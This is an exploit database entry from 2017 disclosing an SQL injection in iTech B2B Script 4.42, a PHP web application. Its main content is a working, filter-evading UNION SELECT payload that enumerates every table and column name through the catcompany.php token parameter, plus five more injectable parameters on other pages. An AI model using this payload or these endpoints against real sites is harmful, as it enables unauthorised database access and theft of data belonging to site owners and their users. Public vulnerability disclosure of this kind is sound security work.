iTech B2B Script 4.42 - SQL Injection

EDB-ID:

42505

CVE:

N/A


Platform:

PHP

Published:

2017-08-18

# # # # #
# Exploit Title: Itech B2B Script 4.42 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/c/B2B/
# Demo: http://b2b.itechscripts.com/
# Version: 4.42
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE:
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
# http://localhost/[PATH]/catcompany.php?token=[SQL]
# -1048a1d0c6e83f027327d8461063f4ac58a6'+/*!22222union*/+/*!22222select*/+0x31,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x33,0x34,0x35,0x36--+-
#
# http://localhost/[PATH]/search.php?keywords=[SQL]
#
# http://localhost/[PATH]/search.php?rctyp=[SQL]
#
# http://localhost/[PATH]/buyleads-details.php?id=[SQL]
#
# http://localhost/[PATH]/category.php?token=[SQL]
#
# http://localhost/[PATH]/company/index.php?c=[SQL]
#
# Reference:
# 
# # # # #